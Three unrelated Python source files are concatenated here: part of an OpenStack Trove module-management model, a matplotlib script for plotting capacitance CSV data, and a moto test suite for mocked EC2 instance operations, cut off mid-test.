context, 'create', tenant_id, auto_apply, visible)
datastore_id, datastore_version_id = Module.validate_datastore(
datastore, datastore_version)
if Module.key_exists(
name, module_type, tenant_id,
datastore_id, datastore_version_id):
datastore_str = datastore_id or Modules.MATCH_ALL_NAME
ds_version_str = datastore_version_id or Modules.MATCH_ALL_NAME
raise exception.ModuleAlreadyExists(
name=name, datastore=datastore_str, ds_version=ds_version_str)
md5, processed_contents = Module.process_contents(contents)
module = DBModule.create(
name=name,
type=module_type.lower(),
contents=processed_contents,
description=description,
tenant_id=tenant_id,
datastore_id=datastore_id,
datastore_version_id=datastore_version_id,
auto_apply=auto_apply,
visible=visible,
live_update=live_update,
md5=md5)
return module
# Certain fields require admin access to create/change/delete
@staticmethod
def validate_action(context, action_str, tenant_id, auto_apply, visible):
error_str = None
if not context.is_admin:
option_strs = []
if tenant_id is None:
option_strs.append(_("Tenant: %s") % Modules.MATCH_ALL_NAME)
if auto_apply:
option_strs.append(_("Auto: %s") % auto_apply)
if not visible:
option_strs.append(_("Visible: %s") % visible)
if option_strs:
error_str = "(" + " ".join(option_strs) + ")"
if error_str:
raise exception.ModuleAccessForbidden(
action=action_str, options=error_str)
@staticmethod
def validate_datastore(datastore, datastore_version):
datastore_id = None
datastore_version_id = None
if datastore:
ds, ds_ver = datastore_models.get_datastore_version(
type=datastore, version=datastore_version)
datastore_id = ds.id
if datastore_version:
datastore_version_id = ds_ver.id
elif datastore_version:
msg = _("Cannot specify version without datastore")
raise exception.BadRequest(message=msg)
return datastore_id, datastore_version_id
@staticmethod
def key_exists(name, module_type, tenant_id, datastore_id,
datastore_version_id):
try:
DBModule.find_by(
name=name, type=module_type, tenant_id=tenant_id,
datastore_id=datastore_id,
datastore_version_id=datastore_version_id,
deleted=False)
return True
except exception.ModelNotFoundError:
return False
# We encrypt the contents (which should be encoded already, since it
# might be in binary format) and then encode them again so they can
# be stored in a text field in the Trove database.
@staticmethod
def process_contents(contents):
md5 = hashlib.md5(contents).hexdigest()
encrypted_contents = crypto_utils.encrypt_data(
contents, Modules.ENCRYPT_KEY)
return md5, crypto_utils.encode_data(encrypted_contents)
# Do the reverse to 'deprocess' the contents
@staticmethod
def deprocess_contents(processed_contents):
encrypted_contents = crypto_utils.decode_data(processed_contents)
return crypto_utils.decrypt_data(
encrypted_contents, Modules.ENCRYPT_KEY)
@staticmethod
def delete(context, module):
Module.validate_action(
context, 'delete',
module.tenant_id, module.auto_apply, module.visible)
Module.enforce_live_update(module.id, module.live_update, module.md5)
module.deleted = True
module.deleted_at = datetime.utcnow()
module.save()
@staticmethod
def enforce_live_update(module_id, live_update, md5):
if not live_update:
instances = DBInstanceModule.find_all(
module_id=module_id, md5=md5, deleted=False).all()
if instances:
raise exception.ModuleAppliedToInstance()
@staticmethod
def load(context, module_id):
module = None
try:
if context.is_admin:
module = DBModule.find_by(id=module_id, deleted=False)
else:
module = DBModule.find_by(
id=module_id, tenant_id=context.tenant, visible=True,
deleted=False)
except exception.ModelNotFoundError:
# See if we have the module in the 'all' tenant section
if not context.is_admin:
try:
module = DBModule.find_by(
id=module_id, tenant_id=None, visible=True,
deleted=False)
except exception.ModelNotFoundError:
pass # fall through to the raise below
if not module:
msg = _("Module with ID %s could not be found.") % module_id
raise exception.ModelNotFoundError(msg)
# Save the encrypted contents in case we need to put it back
# when updating the record
module.encrypted_contents = module.contents
module.contents = Module.deprocess_contents(module.contents)
return module
@staticmethod
def update(context, module, original_module):
Module.enforce_live_update(
original_module.id, original_module.live_update,
original_module.md5)
# we don't allow any changes to 'admin'-type modules, even if
# the values changed aren't the admin ones.
access_tenant_id = (None if (original_module.tenant_id is None or
module.tenant_id is None)
else module.tenant_id)
access_auto_apply = original_module.auto_apply or module.auto_apply
access_visible = original_module.visible and module.visible
Module.validate_action(
context, 'update',
access_tenant_id, access_auto_apply, access_visible)
ds_id, ds_ver_id = Module.validate_datastore(
module.datastore_id, module.datastore_version_id)
if module.contents != original_module.contents:
md5, processed_contents = Module.process_contents(module.contents)
module.md5 = md5
module.contents = processed_contents
else:
# on load the contents were decrypted, so
# we need to put the encrypted contents back before we update
module.contents = original_module.encrypted_contents
if module.datastore_id:
module.datastore_id = ds_id
if module.datastore_version_id:
module.datastore_version_id = ds_ver_id
module.updated = datetime.utcnow()
DBModule.save(module)
class InstanceModules(object):
@staticmethod
def load(context, instance_id=None, module_id=None, md5=None):
selection = {'deleted': False}
if instance_id:
selection['instance_id'] = instance_id
if module_id:
selection['module_id'] = module_id
if md5:
selection['md5'] = md5
db_info = DBInstanceModule.find_all(**selection)
if db_info.count() == 0:
LOG.debug("No instance module records found")
limit = utils.pagination_limit(
context.limit, Modules.DEFAULT_LIMIT)
data_view = DBInstanceModule.find_by_pagination(
'modules', db_info, 'foo', limit=limit, marker=context.marker)
next_marker = data_view.next_page_marker
return data_view.collection, next_marker
class InstanceModule(object):
def __init__(self, context, instance_id, module_id):
self.context = context
self.instance_id = instance_id
self.module_id = module_id
@staticmethod
def create(context, instance_id, module_id, md5):
instance_module = DBInstanceModule.create(
instance_id=instance_id,
module_id=module_id,
md5=md5)
return instance_module
@staticmethod
def delete(context, instance_module):
instance_module.deleted = True
instance_module.deleted_at = datetime.utcnow()
instance_module.save()
@staticmethod
def load(context, instance_id, module_id, deleted=False):
instance_module = None
try:
instance_module = DBInstanceModule.find_by(
instance_id=instance_id, module_id=module_id, deleted=deleted)
except exception.ModelNotFoundError:
pass
return instance_module
@staticmethod
def update(context, instance_module):
instance_module.updated = datetime.utcnow()
DBInstanceModule.save(instance_module)
class DBInstanceModule(models.DatabaseModelBase):
_data_fields = [
'id', 'instance_id', 'module_id', 'md5', 'created',
'updated', 'deleted', 'deleted_at']
class DBModule(models.DatabaseModelBase):
_data_fields = [
'id', 'name', 'type', 'contents', 'description',
'tenant_id', 'datastore_id', 'datastore_version_id',
'auto_apply', 'visible', 'live_update',
'md5', 'created', 'updated', 'deleted', 'deleted_at']
def persisted_models():
return {'modules': DBModule, 'instance_modules': DBInstanceModule}
|
import csv
import datetime
import matplotlib.pyplot as plt
import matplotlib
import itertools
import numpy
import argparse
import sys
YMIN = 0
YMAX = 35000
"""
colors = ['b', 'g', 'r',
'c', 'm', 'y',
'k'
]
"""
def read_datafile(file_name, norm_time):
time = []
capacitance = []
with open(file_name, 'rb') as f:
reader = csv.reader(f)
for row in reader:
time.append(matplotlib.dates.datestr2num(row[0]))
capacitance.append(row[1:])
if norm_time:
return (range(0, len(time)), capacitance)
else:
return (time, capacitance)
def plot_data(file_name, norm_time=True, skip_list=None):
data_far = read_datafile(file_name, norm_time)
it = itertools.izip(*data_far[1]) # get iterator to capacitance data
channel = 0
ploting_function = None
if norm_time:
plotting_function = plt.plot
else:
plt.gca().xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S.%f"))
plotting_function = plt.plot_date
color_list = []
name = ["1+2","1-3","1-4","2+3","2-4","3+4","LED"];
colors = ['b', 'g', 'r',
'c', 'm', 'y',
'k', '0.75']
for i in it:
if skip_list == None or not channel in skip_list:
# select color that is different enough from already used colors
while True:
color = numpy.random.rand(3,1)
for col in color_list:
diff = numpy.linalg.norm(col-color)
if diff < 100:
break
break
color_list.append(color)
plotting_function(data_far[0], i, color=colors[channel], linestyle="-", marker=".",
label=" "+ name[channel])
channel += 1
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Tool that can read CSV files generated by VSP experiments.')
parser.add_argument('files', nargs='+', help='Input file(s)')
parser.add_argument('-t', '--time', default=False, action='store_true', help='Plot time instead of measurement number')
parser.add_argument('-s', '--skip', nargs='+', default=None, type=int, help='Don\'t plot these channels')
parser.add_argument('-l', '--limit', default=False, action='store_true', help='Limit y scale from %i to %i' % (YMIN, YMAX))
parser.add_argument('--title', default="", help='Title for the plot')
args = parser.parse_args()
if args.files == None:
parser.print_help()
sys.exit()
for f in args.files:
plot_data(f, not args.time, args.skip)
plt.ylim([30000, YMAX])
plt.draw()
plt.ylabel('CDC output')
if not args.time:
plt.xlim([0, 250])
if args.limit:
plt.ylim([YMIN, YMAX])
plt.axhline(32768)
plt.legend( loc='upper right' )
plt.grid(which='both')
plt.title(args.title)
plt.show()
|
from __future__ import unicode_literals
from botocore.exceptions import ClientError
import pytest
from unittest import SkipTest
import base64
import ipaddress
import six
import boto
import boto3
from boto.ec2.instance import Reservation, InstanceAttribute
from boto.exception import EC2ResponseError
from freezegun import freeze_time
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2, settings
from tests import EXAMPLE_AMI_ID
from tests.helpers import requires_boto_gte
if six.PY2:
decode_method = base64.decodestring
else:
decode_method = base64.decodebytes
################ Test Readme ###############
def add_servers(ami_id, count):
conn = boto.connect_ec2()
for index in range(count):
conn.run_instances(ami_id)
@mock_ec2_deprecated
def test_add_servers():
add_servers(EXAMPLE_AMI_ID, 2)
conn = boto.connect_ec2()
reservations = conn.get_all_reservations()
assert len(reservations) == 2
instance1 = reservations[0].instances[0]
assert instance1.image_id == EXAMPLE_AMI_ID
############################################
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_launch_and_terminate():
conn = boto.ec2.connect_to_region("us-east-1")
with pytest.raises(EC2ResponseError) as ex:
reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set"
)
reservation = conn.run_instances(EXAMPLE_AMI_ID)
reservation.should.be.a(Reservation)
reservation.instances.should.have.length_of(1)
instance = reservation.instances[0]
instance.state.should.equal("pending")
reservations = conn.get_all_reservations()
reservations.should.have.length_of(1)
reservations[0].id.should.equal(reservation.id)
instances = reservations[0].instances
instances.should.have.length_of(1)
instance = instances[0]
instance.id.should.equal(instance.id)
instance.state.should.equal("running")
instance.launch_time.should.equal("2014-01-01T05:00:00.000Z")
instance.vpc_id.shouldnt.equal(None)
instance.placement.should.equal("us-east-1a")
root_device_name = instance.root_device_name
instance.block_device_mapping[root_device_name].status.should.equal("in-use")
volume_id = instance.block_device_mapping[root_device_name].volume_id
volume_id.should.match(r"vol-\w+")
volume = conn.get_all_volumes(volume_ids=[volume_id])[0]
volume.attach_data.instance_id.should.equal(instance.id)
volume.status.should.equal("in-use")
with pytest.raises(EC2ResponseError) as ex:
conn.terminate_instances([instance.id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set"
)
conn.terminate_instances([instance.id])
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.state.should.equal("terminated")
@mock_ec2
def test_instance_terminate_discard_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": True},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert not list(ec2_resource.volumes.all())
@mock_ec2
def test_instance_terminate_keep_volumes_explicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": False},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 1
@mock_ec2
def test_instance_terminate_keep_volumes_implicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}}],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(instance_volume_ids) == 1
volume = ec2_resource.Volume(instance_volume_ids[0])
volume.state.should.equal("available")
@mock_ec2
def test_instance_terminate_detach_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}},
],
)
instance = result[0]
for volume in instance.volumes.all():
response = instance.detach_volume(VolumeId=volume.volume_id)
response["State"].should.equal("detaching")
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 2
@mock_ec2
def test_instance_detach_volume_wrong_path():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},],
)
instance = result[0]
for volume in instance.volumes.all():
with pytest.raises(ClientError) as ex:
instance.detach_volume(VolumeId=volume.volume_id, Device="/dev/sdf")
ex.value.response["Error"]["Code"].should.equal("InvalidAttachment.NotFound")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The volume {0} is not attached to instance {1} as device {2}".format(
volume.volume_id, instance.instance_id, "/dev/sdf"
)
)
@mock_ec2_deprecated
def test_terminate_empty_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_attach_volume():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
vol1 = conn.create_volume(size=36, zone=conn.region.name)
vol1.attach(instance.id, "/dev/sda1")
vol1.update()
vol2 = conn.create_volume(size=65, zone=conn.region.name)
vol2.attach(instance.id, "/dev/sdb1")
vol2.update()
vol3 = conn.create_volume(size=130, zone=conn.region.name)
vol3.attach(instance.id, "/dev/sdc1")
vol3.update()
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.block_device_mapping.should.have.length_of(3)
for v in conn.get_all_volumes(
volume_ids=[instance.block_device_mapping["/dev/sdc1"].volume_id]
):
v.attach_data.instance_id.should.equal(instance.id)
# can do due to freeze_time decorator.
v.attach_data.attach_time.should.equal(instance.launch_time)
# can do due to freeze_time decorator.
v.create_time.should.equal(instance.launch_time)
v.region.name.should.equal(instance.region.name)
v.status.should.equal("in-use")
@mock_ec2_deprecated
def test_get_instances_by_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
reservations = conn.get_all_reservations(instance_ids=[instance1.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(1)
reservation.instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(2)
instance_ids = [instance.id for instance in reservation.instances]
instance_ids.should.equal([instance1.id, instance2.id])
# Call get_all_reservations with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_reservations(instance_ids=[instance1.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_get_paginated_instances():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
for i in range(100):
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
resp = client.describe_instances(MaxResults=50)
reservations = resp["Reservations"]
reservations.should.have.length_of(50)
next_token = resp["NextToken"]
next_token.should_not.be.none
resp2 = client.describe_instances(NextToken=next_token)
reservations.extend(resp2["Reservations"])
reservations.should.have.length_of(100)
assert "NextToken" not in resp2.keys()
@mock_ec2
def test_create_with_tags():
ec2 = boto3.client("ec2", region_name="us-west-2")
instances = ec2.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
InstanceType="t2.micro",
TagSpecifications=[
{
"ResourceType": "instance",
"Tags": [
{"Key": "MY_TAG1", "Value": "MY_VALUE1"},
{"Key": "MY_TAG2", "Value": "MY_VALUE2"},
],
},
{
"ResourceType": "instance",
"Tags": [{"Key": "MY_TAG3", "Value": "MY_VALUE3"}],
},
],
)
assert "Tags" in instances["Instances"][0]
len(instances["Instances"][0]["Tags"]).should.equal(3)
@mock_ec2_deprecated
def test_get_instances_filtering_by_state():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
conn.terminate_instances([instance1.id])
reservations = conn.get_all_reservations(filters={"instance-state-name": "running"})
reservations.should.have.length_of(1)
# Since we terminated instance1, only instance2 and instance3 should be
# returned
instance_ids = [instance.id for instance in reservations[0].instances]
set(instance_ids).should.equal(set([instance2.id, instance3.id]))
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "running"}
)
reservations.should.have.length_of(1)
instance_ids = [instance.id for instance in reservations[0].instances]
instance_ids.should.equal([instance2.id])
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "terminated"}
)
list(reservations).should.equal([])
# get_all_reservations should still return all 3
reservations = conn.get_all_reservations()
reservations[0].instances.should.have.length_of(3)
conn.get_all_reservations.when.called_with(
filters={"not-implemented-filter": "foobar"}
).should.throw(NotImplementedError)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
reservations = conn.get_all_reservations(filters={"instance-id": instance1.id})
# get_all_reservations should return just instance1
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"instance-id": [instance1.id, instance2.id]}
)
# get_all_reservations should return two
reservations[0].instances.should.have.length_of(2)
reservations = conn.get_all_reservations(filters={"instance-id": "non-existing-id"})
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_type():
conn = boto.connect_ec2()
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance1 = reservation1.instances[0]
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance2 = reservation2.instances[0]
reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance3 = reservation3.instances[0]
reservations = conn.get_all_reservations(filters={"instance-type": "m1.small"})
# get_all_reservations should return instance1,2
reservations.should.have.length_of(2)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]
set(instance_ids).should.equal(set([instance1.id, instance2.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "t1.micro"})
# get_all_reservations should return one
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(
filters={"instance-type": ["t1.micro", "m1.small"]}
)
reservations.should.have.length_of(3)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
reservations[2].instances.should.have.length_of(1)
instance_ids = [
reservations[0].instances[0].id,
reservations[1].instances[0].id,
reservations[2].instances[0].id,
]
set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "bogus"})
# bogus instance-type should return none
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_reason_code():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
reservations = conn.get_all_reservations(
filters={"state-reason-code": "Client.UserInitiatedShutdown"}
)
# get_all_reservations should return instance1 and instance2
reservations[0].instances.should.have.length_of(2)
set([instance1.id, instance2.id]).should.equal(
set([i.id for i in reservations[0].instances])
)
reservations = conn.get_all_reservations(filters={"state-reason-code": ""})
# get_all_reservations should return instance 3
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_source_dest_check():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
conn.modify_instance_attribute(
instance1.id, attribute="sourceDestCheck", value=False
)
source_dest_check_false = conn.get_all_reservations(
filters={"source-dest-check": "false"}
)
source_dest_check_true = conn.get_all_reservations(
filters={"source-dest-check": "true"}
)
source_dest_check_false[0].instances.should.have.length_of(1)
source_dest_check_false[0].instances[0].id.should.equal(instance1.id)
source_dest_check_true[0].instances.should.have.length_of(1)
source_dest_check_true[0].instances[0].id.should.equal(instance2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_vpc_id():
conn = boto.connect_vpc("the_key", "the_secret")
vpc1 = conn.create_vpc("10.0.0.0/16")
subnet1 = conn.create_subnet(vpc1.id, "10.0.0.0/27")
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)
instance1 = reservation1.instances[0]
vpc2 = conn.create_vpc("10.1.0.0/16")
subnet2 = conn.create_subnet(vpc2.id, "10.1.0.0/27")
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)
instance2 = reservation2.instances[0]
reservations1 = conn.get_all_reservations(filters={"vpc-id": vpc1.id})
reservations1.should.have.length_of(1)
reservations1[0].instances.should.have.length_of(1)
reservations1[0].instances[0].id.should.equal(instance1.id)
reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)
reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)
reservations2 = conn.get_all_reservations(filters={"vpc-id": vpc2.id})
reservations2.should.have.length_of(1)
reservations2[0].instances.should.have.length_of(1)
reservations2[0].instances[0].id.should.equal(instance2.id)
reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)
reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_architecture():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)
instance = reservation.instances
reservations = conn.get_all_reservations(filters={"architecture": "x86_64"})
# get_all_reservations should return the instance
reservations[0].instances.should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_image_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "image-id", "Values": [EXAMPLE_AMI_ID]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_account_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "owner-id", "Values": ["123456789012"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_private_dns():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"
)
reservations = client.describe_instances(
Filters=[{"Name": "private-dns-name", "Values": ["ip-10-0-0-1.ec2.internal"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_ni_private_dns():
client = boto3.client("ec2", region_name="us-west-2")
conn = boto3.resource("ec2", "us-west-2")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"
)
reservations = client.describe_instances(
Filters=[
{
"Name": "network-interface.private-dns-name",
"Values": ["ip-10-0-0-1.us-west-2.compute.internal"],
}
]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_name():
client = boto3.client("ec2", region_name="us-east-1")
client.create_security_group(Description="test", GroupName="test_sg")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-name", "Values": ["test_sg"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_id():
client = boto3.client("ec2", region_name="us-east-1")
create_sg = client.create_security_group(Description="test", GroupName="test_sg")
group_id = create_sg["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-id", "Values": [group_id]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_subnet_id():
client = boto3.client("ec2", region_name="us-east-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(CidrBlock=str(vpc_cidr),)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,
)
reservations = client.describe_instances(
Filters=[{"Name": "subnet-id", "Values": [subnet_id]}]
)["Reservations"]
reservations.should.have.length_of(1)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag:tag0": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag:tag1": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(filters={"tag:tag2": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_value():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag-value": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-value": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag-value": ["value2", "value1"]}
)
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(filters={"tag-value": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_name():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1")
instance1.add_tag("tag2")
instance2.add_tag("tag1")
instance2.add_tag("tag2X")
instance3.add_tag("tag3")
reservations = conn.get_all_reservations(filters={"tag-key": "tagX"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
